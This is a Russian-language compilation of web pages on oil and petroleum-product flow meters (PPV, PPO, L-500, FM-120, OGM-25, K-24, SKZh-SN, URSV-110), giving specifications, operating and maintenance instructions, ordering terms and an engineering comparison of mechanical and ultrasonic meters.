Счётчики нефти и нефтепродуктов: виды счётчиов жидкости

Расходомеры для нефтепродуктов – это измерительные приборы, работа которых проходит в сложных условиях эксплуатации. К нефтяным расходомерам или расходомерам нефтепродуктов предъявляют высокие качественные требования, как и к подбору сопутствующего оборудования.

Модельный ряд расходомеров нефти

Принцип работы нефтяных расходомеров

Нахождение расхода нефтепродуктов, масел и других подобных жидкостей базируется на элементарных физических явлениях и выражениях одних величин через другие зависимые величины.

В каталоге представлены приборы, которые берут за основу разные методы измерения. Это и эффект Кориолиса, и ультразвуковой способ определения расхода, приборы с овально-шестерёнчатым механизмом с участием герконов, приборы роторного типа.

Электромагнитные расходомеры принцип которых базируется на явлении электромагнитной индукции. Ротаметры, где поплавок, на который действуют уравновешенные сила тяжести и сила со стороны жидкости, указывает на текущий расход.

Общие технические характеристики расходомеров нефти

  • Измеряемая среда: жидкости, масла, нефтепродукты, гликолевые растворы, топливо, нефть и др.;
  • Различные диаметры условного прохода;
  • Аналоговые выходы: 4…20 мA; 0…20 мA; 10…36 В; 0…10 В;
  • Цифровые выходы: мax 12,5 Гц, EIA-485, Modbus RTU;
  • Импульсные и частотные выходы;
  • Исполнение в соответствии с ATEX, FDA.

Достоинства и преимущества расходомеров нефти и нефтепродуктов

Представленные расходомеры нефти и нефтепродуктов обладают рядом преимуществ, обусловленных исполнением и принципом работы.

Общие преимущества, которые объединяют представленные модели приборов, это:

  • Повышенная прочность конструкции;
  • Работа с большими расходами;
  • Высокая точность измерений даже при работе в тяжелых условиях эксплуатации;
  • Различные модификации и опциональные дополнения;
  • Малые потери давления;
  • Износостойкость.

Недостатки

Как и достоинства, недостатки определяются особенностями конструкции и принципом измерения:

  1. В расходомерах, где овальные шестерни или турбина выступают как устройства непосредственного взаимодействия с измеряемой средой, присутствует фактор механического износа подвижных частей. Контроль расхода по ротаметру производиться непосредственно по шкале на самом приборе и взаимодействовать с ним удаленно не представляется возможным.
  2. Недостаток ультразвуковых расходомеров кроется в осадках в трубопроводе, который может как поглощать, так и отражать ультразвук, что повлияет на результаты измерения.
  3. Электромагнитные расходомеры требовательны к свойству электрической проводимости измеряемой среды.

Где применяются нефтяные расходомеры

Расходомеры – это важные устройства измерения на многих стадиях нефтедобычи:

  • подъем нефтяного сырья
  • транспортировка
  • последующая переработка

Этот параметр задействован в САУ и в коммерческом учете нефтепродуктов.

Требования к расходомерам оправданно высоки, а риски неправильного подбора оборудования недопустимы. В компании «РусАвтоматизация» вам помогут выбрать наиболее подходящий именно под ваши условия эксплуатации расходомер нефти. Это будет оптимальный вариант по доступной цене. Для более подробной информации обратитесь к представителям нашей компании.

Источник: https://RusAutomation.ru/rashodomery/rashodomery-nefti

Счетчики винтовые ППВ для учета нефтепродуктов и других жидкостей | ООО «Нефтепродактс»

6. — Преобразователь первичный — ППВ В данной комплектации ОАО «Промприбор» поставляет счетчик жидкости винтовой с необходимым условным проходом в комплекте с интеллектуальным датчиком ДИ-О-5 (имеющий частотный и интерфейсный выход RS-485), клеммной коробкой, которая находится непосредственно на самом счетчике и служит для присоединения датчика и по заказу потребителя программное обеспечение (CD диск) для связи с существующей у заказчика SCADA системой или ПО верхнего уровня. 

Контроллер или иной вторичный прибор с поддержкой интерфейса RS-485, в данном случае, имеется у потребителя.

Технические характеристики

Тип счетчика Цена деления отсчетного устройства, л Условный проход, ДУ, мм Рабочее давление, МПа Температура изм. жидк., °С Класс точности Масса, кг
механ. электр.
ППВ-100/1,6 10 1 100 1,6 от -50 до +50 0,15*; 0,25; 0,5 45
ППВ-100/6,4 10 1 100 6,4 от -50 до +50 0,15*; 0,25; 0,5 135
ППВ-150/1,6 10 1 150 1,6 от -50 до +50 0,15*; 0,25; 0,5 270
ППВ-150/6,4 10 1 150 6,4 от -50 до +50 0,15*; 0,25; 0,5 270

* — на определенном расходе, указанном заказчиком, в пределах 10% от общего диапазона расхода на данный вид счетчика

Тип счетчика Класс точности Диапазон вязкости измеряемой жидкости, мм2/с
0,55-1,1  |  1,1-6,0 6,0-60 60-300
Расход, м3/ч
min ном max min ном max min ном max
ППВ-100/1,6 0,25 18 120 180 10 80 100 4 60 80
0,5 15 120 180 5 80 100 3 60 80
ППВ-100/6,4 0,25; 0,5 18 120 180 10 80 100 4 60 80
ППВ-150/1,6 0,25; 0,5 30 250 420 20 250 350 15 200 300
ППВ-150/6,4

Схема выполнения заказа

Продажи ведутся по предварительным заявкам клиентов или заполненным опросным листам. В заявке указывается следующее:

  • Полное наименование организации.
  • Телефон, телефон/факс (лицо контакта) и электронная почта.
  • Банковские реквизиты.
  • Наименование продукции с обязательным указанием области применения счетчиков (технологическая цепь).
  • Вариант доставки продукции:
    • самовывоз (автотранспорт);
    • автотранспортные услуги (услуги ОАО «Промприбор» или услуги автотранспортных компаний) — оплачиваются потребителем;
    • железнодорожная доставка (контейнер или вагон) — указывается получатель, код получателя, ОКПО, код станции, название станции — оплачиваются потребителем.
  • Заполненный опросный лист.

Оказываемые услуги

  • Метрологическая поверка счетчиков производства ОАО «Промприбор».
  • Техническая оценка и ремонт счетчиков.
  • Монтажные, шефмонтажные и пусконаладочные работы.
  • Консультации квалифицированных специалистов.
  • Сервисное обслуживание.

Межповерочный интервал не реже 1 раза в 2 года.

Гарантийный срок 12 месяцев.

Источник: https://nefteproducts.com/catalog/product-schetchiki-vintovye-ppv-dlya-ucheta-nefteproduktov-i-drugih-zhidkostey

Счётчики жидкости и литромеры от ООО "АЗТ СК"

  Продажа оборудование для АЗС, Нефтебаз и АГЗС включает в себя поставку счетчиков жидкости на территории РФ. Вашему вниманию всегда хорошая цена, информация о ремонте и каталоги запчастей.

  • Назначение литромера Л-500
  • Литромер Л-500 ДУ 70 предназначен для учета расхода светлых нефтепродуктов на раздаточных установках нефтебаз, путем включения его в поток жидкости, протекающей потрубопроводу.
  • При раздаче нефтепродуктов с помощью счетчиков литромеров на АЗСдостигается точность учета расхода горючей жидкости, исключая потери и возможности злоупотреблений, благодаря закрытому способу раздачи топлива литромером, а также сокращаются сроки выдачи учитываемой горючей жидкости.
  • Конструкция литромера

По своей конструкци литромер Л-500 представляет собой гидравлический двигатель, приводимый в движение напором протекающей через него жидкости. Количества протекающей через него горючей жидкости (разовое и сумарное) регистрируются счетным механизмом.

Конструкция литромера обеспечивает точность работы этогооборудования для АЗС при положительных и отрицательных температурах окружающего воздуха в тяжелых условиях московского климата.

Назначение расходомера топливного

Счетчик расхода дизельного топлива ППВ-100/1,6су применяется на нефтебазах для учета и измерения объемных количеств бензина, керосина, других видов топлива и масла. Отличительной особенностью этого расходомера является то, что рабочими элементами тут являются винты.

Принцип действия винтовых счетчиков дизельного топливазаключается в том, что два винта находящиеся в зацеплении, вращаются под действием потока измеряемой жидкости, отмеряют при каждом обороте некоторый объем. В качестве вторичного прибора на АЗС может применяться механическое счетное устройство СУ или устройство съема сигнала УСС.

Также при учете на нефтебазах успешно применяютсчетчики топлива ППО-40.

Конструктивные особенности счетчика

Расходомер дизельного топлива ППВ-100/1,6су представляет собой более новую модель счетчика по сравнению с таким оборудованием как Л-500,ЛЖ-100, СЖШ-1000.

Технические возможности счетчика учета топлива ППВ-100 в отличите отсчетчика жидкости ППО-25 позволяют путем подбора счетного блока шестерен устанавливать класс точности: 0,5% и 0,25%.

Класс точности 0,25% значительно повышает точность учета выдаваемых и принимаемых через расходомер дизельного топлива светлых нефтепродуктов как на стационарных базах выдачи и хранения нефтепродуктов, так и на передвижных пунктах заправки.

Счетчик учета топлива ППВ-100 по своим температурным параметрам позволяет использовать его на всей территории России.

Этот топливный расходомер в отличие от счетчика ППВ-100 имеет овальные шестерни. Счетчик жидкости ППО-25 используется для измерения объёма проходящих через него светлых нефтепродуктов. Точность измерений прошедшего через него объема топлива достаточно высока.

Незаменимый для автозаправочночной станции счётчик расхода жидкости ППО-25 может применяться как на стационарных АЗС так и в передвижных пунктах заправки ГСМ исключающих воздействие прямых солнечных лучей и атмосферных осадков.

В отличие от более дешевого варианта учета выданного объема топлива — литромера Л-500, счетчик количества жидкости ППО-25 может комплектоваться устройством съёма сигнала, вторичным прибором или другими аналогичными приборами.

Для правильной эксплуатации на нефтебазе перед литромером необходимо устанавливать фильтр тонкой очистки топлива ФЖУ-25, который предотвратит попадание механических примесей в расходомер.

Описание принципа работы расходомера жидкости ППО-25

Принцип работы счетчика расхода жидкости состоит в прохождение измеряемого топлива через первичный преобразователь, вращая при этом овальные шестерни. На оси ведущей шестерни расходомера жидкости ППО-25 нарезан зубчатый венец, посредством которого передаётся вращение на магнитную муфту. Она в свою очередь передаёт вращение от ведущей овальной шестерни на счётное устройство.

Учёт количества жидкости, прошедшей через него, основан на отсчёте числа оборотов овальных шестерен. Расходомеры ППО-25 подразделяются на два класса точности: 0,25% и 0,5%, каждый из которых определяется подбором сменного блока зубчатых колёс.

Надёжная и безупречная эксплуатация счетчика количества жидкости на АЗС обеспечивается выполнением всех технических требований перечисленных в руководстве эксплуатации.

Назначение расходомера

Счетчики жидкого топлива с овальными шестернями ППО-40-0,6СУ предназначены для измерения объемного количества неагрессивных жидкостей — бензина, керосина, дизельного топлива, масел. Эти расходомеры могут применяться как в стационарных установках для учета выдачи нефтепродуктов в условиях нефтебаз или АЗС, так и в наземных средствах заправки и перекачки при их работе на месте.

Конструкция счетчиков учета топлива

Расходомер ППО-40 состоит из следующих основных частей: преобразователь первичный, в состав которого входит измерительная камера, магнитная муфта, а также счетное устройство или устройство съема сигнала.

Муфта магнитная счетчика учета топлива ППО состоит из двух кольцевых магнитов расположенных один внутри другого и разделенных металлическим стаканом. Муфта передает вращение от ведущей овальной шестерни на счетное устройство счетчика.

В свою очередь счетное устройство служит для отсчета количества топлива, прошедшего через счетчик, имеет роликовый и стрелочный указатели и устройство для установки стрелок на нуль.

Для приведения показаний счетчика учета в соответствии с действительным количеством прошедшей через него жидкости, в передаточном механизме сменный блок зубчатых колес. Подбором сменного блока показания счетчика жидкого топлива регулируются в пределах от 0,25% до 0,5% .Такая возможность значительно повышает точность учета реализуемых нефтепродуктов.

Конструктивные особенности счетчика позволяют вести учет измеряемого топлива с температурой от – 40 до +60, как и счетчик жидкости ППО-25, что позволяет использовать его в условиях АЗС практически на всей территории России.

Назначение расходомера

Счетчик жидкости СЖШ-1000м предназначен для измерения объемных количеств светлых нефтепродуктов как в стационарных условиях, например, учет выдачи топлива на АЗС или нефтебазах, так и на передвижных установках во время их стоянки. Популярной моделью оборудования для нормированной выдачи дизельного топлива являетсярасходомер FM-120.

Принцип работы счетчика топлива СЖШ-1000м

Действие счетчика основано на отсчете определенных объемов (порций) жидкости, отсекаемых двумя овальными шестернями вращающихся в измерительной камере под действием разности давлений жидкости во входном и выходном патрубках счетчика.

Назначение счетчика дизельного топлива

Расходомер FM-120 предназначен для некоммерческого учета отпущенного дизтоплива в баки транспортных средств. Этот счетчик топлива снабжён механизмом сброса указателя разового учета на ноль, барабанным дисплеем и указателем суммарного учета.

Устройство расходомера топлива

Тип счетчика дизтоплива — дисковый. Корпусные детали насоса отлиты из алюминиевого сплава.

К корпусу расходомера дизельного топлива FM-120 закреплен механизм учета, который имеет возможность крепления с поворотом на 90 градусов, что позволяет ориентировать его в различных позициях.

Счетчик дизтоплива имеет калибровочный винт, при помощи которого настраивается точность отпуска. Данную настройку должен выполнять специалист по оборудованию для нефтебаз, имеющий практические навыки и соответственный уровень подготовки.

  1. Рукоятка сброса служит для обнуления расходомером дизтоплива показаний разового учета .
  2. Технические характеристики расходомера FM-120
  3. Тип топлива: дизтопливо, керосин;
  4. Производительность: 20-120 л/мин;
  5. Наибольшее рабочее давление: 0,3 МПа;
  6. Допустимая погрешность: ±1%
  7. Предел указателя разового учёта: 9999 л;
  8. Предел указателя суммарного учёта: 99999999 л;
  9. Температура эксплуатации: -10-+45 ° С;
  10. Присоединительный размер: 1”;
  11. Габаритные размеры: 185х185х170 мм;
  12. Масса: 1,9 кг.

Назначение

Счетчик жидкости OGM-25 предназначен для некоммерческого учета отпущенного топлива в баки транспортных средств. Расходомер OGM-25 снабжён механизмом сброса указателя разового учета на ноль и указателем суммарного учета.

Устройство расходомера OGM-25

Тип расходомера — шестерёнчатый. В конструкцию счетчика входят овальные шестерни. Это обеспечивает надежность и высокую точность измерений.

Исключительная повторяемость и высокая точность  измерений в широком диапазоне вязкости перекачиваемой жидкости — это отличительные особенности счетчика OGM-25. Корпус и шестерни изготовлены из алюминия.

Механические дисплеи счетчика показывают разовый расход, который можно обнулять и общий необнуляемый расход.

Подготовка изделия к работе

Монтаж данного расходомера должен производится персоналом прошедшим специальную подготовку и обучение

— Закрепить расходомер на устойчивую вертикальную поверхность.
— Выкрутить пластмассовые заглушки со входа и выхода.
— Присоединить расходомер через фильтр, к трубопроводу, предварительно зачистив его от твёрдых механических частиц, которые могут вызвать поломку.

  • — Присоединить к входу расходомера антистатический рукав или рукав с заземленным раздаточным краном для отпуска дизельного топлива потребителю.
  • Порядок работы
  • Не допускается работа:

Без входного фильтра.
При наличии воды в дизтопливе.
При незаполненном всасывающем трубопроводе.

  1. Без заземления.
  2. Для разового отпуска дизтоплива необходимо выполнить следующие действия:

Кнопкой сброса установить разовый указатель на ноль.
Включить насос установив переключатель в положение “пуск”.
Плавным нажатием на рычаг раздаточного крана произвести отпуск нужного количества топлива.
Закрыть раздаточный кран.
Выключить насос, перевести переключатель в положение “выключено”

  • Снять показания.
  • Техническое обслуживание
  • Во время эксплуатации расходомера ежедневно перед началом работы проверять:

Герметичность соединений (отсутствие течи, подтеканий в местах соединений).
Целостность стекла измерителя.
Работоспособность кнопк сброса разового указателя.
Каждые три месяца проверять точность налива, используя при проверках только поверенные средства измерений.

  1. В случае необходимости производить регулировку измерителя.
  2. Указания мер безопасности
  3. Безопасность эксплуатации счетчика обеспечивается выполнением всех технических требований, изложенных настоящем паспорте.
  4. Эксплуатация должна осуществляться при наличии инструкции по технике безопасности, утверждённой главным инженером  предприятия-потребителя.
  5. Сроки эксплуатации и хранения
  6. Гарантии изготовления
  7. Предприятие-изготовитель гарантирует нормальную работу счетчика при соблюдении потребителем условий эксплуатации, транспортирования и хранения.
    Гарантийный срок хранения — 12 месяцев со дня изготовления 
  8. Гарантийный срок эксплуатации — 6 месяцев в пределах гарантийного срока хранения.

Назначение устройства

Электронный счетчик жидкости К-24 используют для определения расхода дизельного топлива при перекачке из емкостей и для заправки автомобильных баков. 
Хорошо зарекомендовал себя в самых различных рабочих условиях, так как является обладателем компактных габаритов, небольшого веса, прост в монтаже и применении.

Электронный счетчик дизельного топлива К-24 отлично совмещается в работе с топливными электронасосами типа MD-60 (220В, 60л/мин),DYB-40 DC24V и DYB 40/12вольт.

Подходит в качестве вспомогательного оборудования в случаях, когда необходим контроль подачи жидкости, а так же для установки на стационарных системах линий распределения дизельного топлива. Электронный счетчик К-24 используется для некоммерческого учета топлива, так как погрешность его измерений находится в пределах +/- 1%.

  • Технические характеристики счетчика дизтоплива К-24
  • измерительная система — турбинная;
    рабочее давление — 10-20 бар;
    давление взрыва — 40 бар;
    пропускная способность не вязких жидкостей — до 120 л/мин.;
    диаметр проходной — 2,5 см;
    рабочие температуры — от -10 до +50 С;
    вес с батареями — 0,25 кг;
    температура хранения — от -20 до +70;
    погрешность измерения менее 1 %;
  • оснащается двумя алкаиновыми батареям ААА 1,5V.

Источник: http://xn--80aoj1ae.xn--p1ai/schyotchiki-zhidkosti-i-litromery/

Счетчики количества жидкости — сырой нефти СКЖ-СН

Счетчики количества жидкости — сырой нефти «СКЖ-СН» (далее — СКЖ-СН) предназначены для измерений массового расхода и массы жидкостей, в том числе дебита нефтяных скважин по сырой нефти.

Описание

  • СКЖ-СН конструктивно выполнен из двух функциональных частей:
  • —    первичный преобразователь расхода жидкости;
  • —    вторичный прибор — электронный блок вычислений, который устанавливается вне взрывоопасной зоны.
  • Первичный преобразователь расхода жидкости представляет собой техническое устройство камерного типа с призматическими ковшами и грузовыми уравновешивателями, служащее для опрокидывания массовой порции сырой нефти.
  • Первичный преобразователь расхода жидкости монтируется непосредственно на трубопроводе с измеряемой средой при помощи фланцевых соединений.
  • Состав первичного преобразователя, его основные узлы, оборудование и контрольноизмерительные приборы:
  • —    входной коллектор, для подачи газожидкостной смеси (далее — ГЖС), состоящей из сырой нефти и попутного нефтяного газа в корпус СКЖ-СН;
  • —    эжектор, для возврата излишней жидкости в сопло-сепаратор;
  • —    камера измерительная (далее — КИ);
  • —    блок измерительный ковшовый (далее — БИК);
  • —    сопло-сепаратор, для отделения сырой нефти и свободного газа;
  • —    выходной коллектор, для отвода ГЖС из СКЖ-СН;
  • —    эжектор, для отвода отсепарированного газа.
  • В состав электронного блока вычислений (далее — ЭБВ) входит контроллер программируемый SIMATIC S7 — 1200 (зарегистрированный в Федеральном информационном фонде по обеспечению единства измерений под регистрационным номером 15771-10) или вычислитель БЭСКЖ-СН.
  • Общий вид первичного преобразователя расхода и ЭБВ c обозначением места нанесения знака поверки приведен на рисунках 1 и 2.

Принцип работы СКЖ-СН основан на прямом методе измерений массы и массового расхода сырой нефти и заключается в поочередном заполнении сырой нефтью одного из двух призматических ковшей, находящихся в измерительной камере с последующим их опрокидыванием в момент достижения в них определенной массы жидкости. Частота заполнений и последующих сливов измерительных камер определяет массовый расход и массу протекающей жидкости.

Преобразование числа поворотов (опрокидываний) ковшей в измерительной камере в электрические импульсы осуществляется посредством воздействия магнитных датчиков, закрепленных на ковшах.

Для подвода рабочей жидкости и ее отвода предназначен коллектор и регулируемое входное устройство (в дальнейшем — сопло-сепаратор).

ГЖС подается во входной коллектор, и через сопло-сепаратор в один из ковшей измерительной камеры, заполняет ковш до величины (в единицах массы), приводящей к изменению условия устойчивого равновесия, обусловленного положением центра масс ковшей в измерительной камере, что приводит к повороту ковшей измерительной камеры и сливу жидкости из ковша в корпус камеры.

Затем этот процесс повторяется на втором ковше камеры. Одновременно в выходной коллектор вытесняется жидкость, находящаяся в нижней части корпуса камеры. При заполнении измерительной камеры часть газа из ГЖС выделяется за счет эффекта гравитационной сепарации.

Избыток газа также вытесняется в выходной коллектор. Необходимым условием работы в закрытой системе сбора (под избыточным давлением), является наличие газа в корпусе преобразователя.

Текущие и суммарные значения массы и массового расхода жидкости вычисляются в ЭБВ и отображаются на индикаторе или на главном меню монитора компьютера, а также фиксируются и хранятся в течение определенного времени в архиве. Кроме того, возможна передача нормируемого импульса в систему телеметрии.

  1. Основное функциональное назначение СКЖ-СН:
  2. —    вычисление массового расхода сырой нефти;
  3. —    вычисление массы сырой нефти;
  4. —    накопление и хранение интегральных значений измеренных параметров;
  5. Лист № 3 Всего листов 5
  6. —    индикация измеряемых, вычисляемых, программируемых параметров на жидкокристаллическом индикаторе ЭБВ;
  7. —    хранение ранее записанных данных при отключении сетевого питания;
  8. —    передача измеряемых и расчётных параметров на автоматизированное рабочее место -оператора.

Программное обеспечение

СКЖ-СН имеет программное обеспечение (далее — ПО), реализованное в ЭБВ СКЖ-СН, сведения о котором приведены в таблице 1.

Таблица 1 — Идентификационные данные ПО

Идентификационные данные ПО Значение
Идентификационное наименование ПО ECLIPSE GCC C/C++ BSKG-SN/CPP
Номер версии (идентификационный номер) ПО 4.5.0 BSKG-SN/CPP 1.0.0.6
Цифровой идентификатор ПО 10.04.2015/01/24/2016

Уровень защиты ПО ЭБВ СКЖ-СН от непреднамеренных и преднамеренных изменений соответствует уровню «средний» в соответствии с Р 50.2.077 — 2014 «ГСИ. Испытания средств измерений в целях утверждения типа. Проверка защиты программного обеспечения».

Технические характеристики

Основные технические и метрологические характеристики СКЖ-СН приведены в таблице 2.

Таблица 2 — Основные технические и метрологические характеристики СКЖ-СН

Наименование характеристики Значение характеристики
Измеряемая среда Нефть сырая
Диапазон массового расхода сырой нефти, т/сут от 2,4 до 480
Рабочее давление, МПа от 0,5 до 6,3
Температура, °С от +5 до +70
Кинематическая вязкость сырой нефти, сСт от 5 до 150
Плотность сырой нефти, кг/м3 от 700 до 1270
Содержание воды в сырой нефти, % от 0 до 100
Г азосодержание рабочей среды, % (в объемных долях) от 0,3 до 95
Концентрация хлористых солей, %, (в массовых долях), не более 7
Массовая доля механических примесей, %, не более 0,15
Массовое содержание сероводорода, %, не более 0,1
Массовая доля серы, %, не более 3,5
Массовая доля парафина, %, не более 7
Пределы допускаемой относительной основной погрешности при измерениях массы и массового расхода сырой нефти, % ±2,5
Климатические условия эксплуатации СКЖ-СН
температура окружающей среды, °С от -35 до +55
атмосферное давление, кПа от 84 до 106,7
относительная влажность воздуха при температуре 15 °С, %., не более 96
  • Лист № 4 Всего листов 5
  • Типоразмеры и диапазоны измерений массового расхода СКЖ-СН приведены в
  • таблице 3.
  • _Таблица № 3 — Типоразмеры и диапазоны измерений расхода СКЖ-СН
Типоразмеры СКЖ-СН Единица измерения Диапазоны массовых расходов рабочей среды
СКЖ-СН — 30 — 6,3 т/ч от 0,1 до 1,25
СКЖ-СН — 60 — 6,3 т/ч от 0,2 до 2,5
СКЖ-СН — 120 — 6,3 т/ч от 0,5 до 5,0
СКЖ-СН — 210 — 6,3 т/ч от 1,0 до 8,75
СКЖ-СН — 480 — 6,3 т/ч от 2,5 до 20,0

Знак утверждения типа

наносится в верхней части по центру титульного листа руководства по эксплуатации СКЖ-СН типографским способом.

Комплектность

Комплектность поставки СКЖ-СН и приведена в таблице №4 .

Таблица №3 — Комплектность поставки СКЖ-СН

Обозначение Наименование Кол.
ИКБ 03.113.100 Счетчик количества жидкости — сырой нефти-СКЖ-СН- ХХХ-ХХ 1

Источник: https://all-pribors.ru/opisanie/64424-16-skzh-sn-73443

Анализ средств учета нефтепродуктов

А.В.Неплохов, директор НПП «ЭЛЕКОМ» г. Екатеринбург

Задача правильного выбора средств учета нефтепродуктов в настоящее время актуальна по причине необходимости обеспечения достоверного учета для целей взаиморасчетов за полученные или отпущенные нефтепродукты. С другой стороны, предложение таких средств учета на рынке России явно недостаточно, что вызывает затруднения для организации корректного учета в целом ряде случаев.

В настоящее время для учета нефтепродуктов в основном используются счетчики двух типов: механические и ультразвуковые. Каждый из указанных типов счетчиков целесообразно применять в определенных случаях.

Счетчики нефтепродуктов механические

Механические счетчики, как правило, используются для организации учета светлых нефтепродуктов . Наиболее распространенными механическими счетчиками нефтепродуктов являются счетчики ППВ, ППО, выпускаемые АООТ «Промприбор», которые предназначены для измерения суммарного и разового количества и расхода жидкостей, в том числе:

  • нефтепродуктов и других неагрессивных жидкостей (винтовой — ППВ);
  • светлых нефтепродуктов, сжиженного газа и других неагрессивных жидкостей (с овальными шестернями — ППО).

Счетчики применяются в стационарных технологических установках, а также в передвижных средствах заправки и перекачки нефтепродуктов. Счетчики комплектуются механическим отсчетным устройством (СУ) или устройством съема сигналов (УСС) с контроллером типа КУП с электронным цифровым отсчетным указателем разового и суммарного учета, а также пультом дистанционной передачи информации «Весна-ТЭЦ».

Технические характеристики счетчиков ППО, ППВ

Общие характеристики

Тип Dу, мм Цена деления, л T изм. жидк, С Р раб, Мпа Вязк., сСт Кл. точ. М, кг

ППО-25/1,6 25 1 -40…+60 1,6 0,55 — 0,25; 7,5
ППО-40/1,6 40 1 0,6 — 300 0,5 20
ППВ-100/1,6 100 10 1,6 0,55 — 0,25; 45
ППВ-100/6,4 100 10 -50…+50 6,4 — 300 0,5 135
ППВ-150/6,4 150 10 6,4 270

Измеряемый расход (м 3 /ч) в зависимости от вязкости жидкости

Вязк., сСт 0,55-1,1 1,1-1,7 1,7-6,0 6,0-16 16-24 24-60 60-300

ППО-25/1,6 0,72-7,2 0,72-7,2 0,72-7,2 0,5-6,0 0,5-6,0 0,5-6,0 0,4-6
ППО-40/1,6 2,5-25 2,5-25 2,5-25 2,0-20 2,0-20 2,0-20 1,8-18
Вязк., сСт 0,55-1,1 1,1-1,7 1,7-6,0 6,0-16 16-24 24-60 60-300
ППВ-100/1,6 15-180 15-180 15-180 5-100 5-100 5-100 3-80
ППВ-100/6,4 18-180 18-180 18-180 10-100 10-100 10-100 4-80
ППВ-150/6,4 30-420 30-420 30-420 20-350 20-350 20-350 15-300

Узел учета нефтепродуктов на базе счетчиков ППО, ППВ

Узел учета нефтепродуктов и других неагрессивных жидкостей с кинематической вязкостью от 0,55 до 6,0 мм 2 /с предназначен для коммерческого учета количества жидкости в единицах объема или единицах массы с пределом абсолютной основной погрешности +0,25%. Узел учета состоит из: объемного счетчика типа ППО, ППВ; газоотделителя, соответствующего счетчику по условному проходу и обеспечивающего отделение паров нефтепродуктов при заданном расходе; фильтра.

По отдельному заказу узел учета может быть укомплектован: счетчиком с фактической погрешностью по объему и массе в пределах +0,1%; плотномером; устройством съема сигналов типа УСС; контроллером и пультом дистанционного управления; клапаном-отсекателем для отпуска определенной дозы нефтепродуктов и в случае осуществления метрологической поверки узла учета; мерником 2-го разряда объемом от 50 до 2000 дм 3 с погрешностью +0,05%; электро или механическими затворами. При установке узла учета в комплекте с плотномером, УСС, контроллером и пультом дистанционного управления отпуск количества жидкости может осуществляться как в единицах объема, так и в единицах массы.

Счетчики нефтепродуктов ультразвуковые

Ультразвуковые счетчики используются для определения объемного расхода и объема нефти и нефтепродуктов (в том числе мазутов) в напорных металлических и пластмассовых трубопроводах. Наиболее распространенным ультразвуковым счетчиком нефтепродуктов является расходомер-счетчик УРСВ-110, выпускаемый ЗАО «Взлет».

УРСВ-110 имеет врезные электроакустические преобразователи (ПЭА) и может выполнять измерения в различных условиях эксплуатации (в том числе во взрывоопасных зонах) при постоянном и переменном (реверсивном) направлении потока жидкости в трубопроводе.

Расходомер-счетчик может комплектоваться первичными преобразователями расхода (ПП) с измерительным участком (ИУ) следующих исполнений: прямолинейный измерительный участок с врезными ПЭА, установленными по диаметру; прямолинейный измерительный участок с врезными ПЭА, установленными по хорде; U-образный измерительный участок (U-колено) с врезными ПЭА, установленными в торцах прямолинейного отрезка участка. Расходомер-счетчик выполняет измерение на одном трубопроводе и индикацию значений следующих параметров:

  • среднего объемного расхода при любом направлении потока жидкости;
  • объемов жидкости нарастающим итогом для каждого направления потока с указанием знака направления потока;
  • объема жидкости нарастающим итогом, как суммы результатов измерения в обоих направлениях с учетом знака направления потока;
  • скорости потока жидкости при любом направлении потока;
  • текущей даты и времени;
  • времени работы расходомера-счетчика при наличии нештатных ситуаций и времени останова при наличии отказов.
  • Кроме того, расходомер-счетчик обеспечивает:
  • работу в режиме дозирования объема;
  • хранение в энергонезависимой памяти и вывод на устройство индикации: архивов измеренных значений объемов (часовых, суточных, месячных, заданном), архивов отказов и архива нештатных ситуаций;
  • самодиагностику и контроль наличия нештатных ситуаций;
  • вывод результатов измерения объема в виде импульсов с нормированным весом;
  • вывод измерительной, диагностической, установочной и архивной информации через интерфейсы RS232 и RS485;
  • возможность определения массового расхода и массы рабочей жидкости, дозирования по массе, автоматической коррекции установленных значений плотности и вязкости рабочей жидкости при изменении температуры и давления в трубопроводе.

Технические характеристики расходомера-счетчика УРСВ-110

Диаметр условного прохода трубопровода, Dу, мм 10 … 4200
Вязкость измеряемой среды, сСт до 500
Температура измеряемой жидкости, о С -30 … +160
Наибольшее давление в трубопроводе, МПа 2,5
Диапазон изменения скорости потока жидкости, м/с, наименьшая / наибольшая 0,1 / 12
Измеряемый расход, м 3 /ч 0,1 … 529200
Класс точности 1,0; 1,5

ВЫВОДЫ

Как было указано в начале, рассмотренные типы счетчиков нефтепродуктов целесообразно применять при определенных условиях. Ниже в таблице приведены основные сравнительные характеристики счетчиков:

Тип счетчика ППО ППВ УРСВ-110
Диаметр условного прохода, Dу, мм 25, 40 100, 150 10 … 4200
Вязкость измеряемой среды, сСт 0,55 … 300 0,55 … 300 до 500
Температура измеряемой жидкости, о С -40 … +60 -50 … +50 -30 … +160
Наибольшее давление в трубопроводе, МПа 1,6; 0,6 1,6; 6,4 2,5
Измеряемый расход, м 3 /ч 0,5 … 25 5 … 420 0,1 … 529200
Класс точности 0,25; 0,5 0,25; 0,5 1,0; 1,5

Таким образом, механические счетчики ППВ, ППО хорошо справляются с задачей учета светлых нефтепродуктов, обладающих относительно малой вязкостью и невысокой температурой. Однако, в сравнении с ультразвуковыми, они обладают более высоким гидравлическим сопротивлением тракта измерения расхода, влияние которого возрастает по мере увеличения вязкости измеряемой среды.

Основными достоинствами ультразвуковых счетчиков УРСВ-110 являются: широкие диапазоны диаметров трубопроводов, измеряемых расходов и допустимых температур измеряемой среды; более высокая вязкость измеряемой среды; отсутствие дополнительно вносимых в тракт измерения расхода гидравлических сопротивлений; возможность измерения реверсивных потоков; широкий набор сервисных функций.

Особую сложность представляет организация учета мазута из-за высокой вязкости при обычных (до 50 о С) температурах. Как правило, для уменьшения вязкости мазут разогревают до 90-120 о С. При таких температурах измеряемой среды механические счетчики не могут использоваться по своим техническим характеристикам.

В этих случаях целесообразно применение ультразвукового расходомера-счетчика. Однако, его применение допустимо только в случае постоянной вязкости мазута (по причине зависимости скорости ультразвука от вязкости среды), т.е. в системах с циркуляцией или постоянным потоком.

Известны случаи, когда в системах с импульсным режимом подачи мазута применение ультразвукового расходомера-счетчика не обеспечивало корректного учета.

В таких системах, единственным выходом остается применение турбинного счетчика ППТ, который выпускается диаметрами 10, 20, 32 мм, предназначен для учета агрессивных жидкостей и мазута и может работать с измеряемой средой температурой –40…+125 о С.

При решении задач учета нефтепродуктов выбор типа счетчика должен определяться обязательно не только его техническими характеристиками, но и характеристиками режимов движения потоков измеряемой среды.

Источник: https://www.elecom-ural.ru/articles/analiz-sredstv-ucheta-nefteproduktov/

Счетчики количества жидкости сырой нефти

  • Счетчики количества жидкости – сырой нефти СКЖ-СН —  это технические устройства камерного типа с опрокидывающими призматическими ковшами и грузовыми уравновешивателями, для опрокидывания массовой порции жидкости-сырой нефти, относятся к области измерительной техники и может быть использовано для измерений массового расхода сырой нефти и ее компонентов (нефти, пластовой воды).
